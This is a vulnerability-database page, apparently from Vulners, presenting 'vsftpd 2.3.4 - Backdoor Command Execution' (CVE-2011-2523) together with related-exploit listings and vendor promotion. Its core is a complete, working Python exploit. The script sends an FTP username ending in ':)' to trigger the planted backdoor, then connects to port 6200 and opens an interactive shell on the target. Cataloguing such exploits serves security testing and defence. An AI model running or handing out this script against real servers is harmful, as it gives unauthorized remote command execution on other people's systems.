Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

vsftpd 2.3.4 - Backdoor Command Execution Exploit

🗓️ 12 Apr 2021 00:00:00Reported by HerculesRDType 
zdt
 zdt🔗 0day.today👁 1355 Views

This script exploits a backdoor command execution vulnerability in vsftpd 2.3.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		homelab-security
30 Apr 202623:41
githubexploit
GithubExploit		Web_Vulnerability_Assessment
8 Jun 202610:37
githubexploit
GithubExploit		Exploit for OS Command Injection in Vsftpd_Project Vsftpd
2 Apr 202615:57
githubexploit
GithubExploit		runtime-exploit-guard
17 Apr 202610:38
githubexploit
GithubExploit		nessus-metasploit-pentest
29 May 202612:03
githubexploit
GithubExploit		Exploiting-FTP-Service-Port-21-on-Metasploitable2
13 Apr 202622:48
githubexploit
GithubExploit		Exploit for OS Command Injection in Vsftpd_Project Vsftpd
7 Nov 202106:20
githubexploit
GithubExploit		Exploit for OS Command Injection in Vsftpd_Project Vsftpd
24 Mar 202620:34
githubexploit
GithubExploit		Exploit for OS Command Injection in Vsftpd_Project Vsftpd
28 Nov 202310:52
githubexploit
GithubExploit		Exploit for OS Command Injection in Vsftpd_Project Vsftpd
15 Dec 202512:22
githubexploit
Rows per page
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3   
                                                           
from telnetlib import Telnet 
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)                           
parser=argparse.ArgumentParser()        
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()       
host = args.host                        
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Apr 2021 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 210
CVSS 3.19.8
EPSS0.94282
vsftpd 2.3.4backdoor command executionherculesrdlinuxcve-2011-2523telnetcommand execution
1355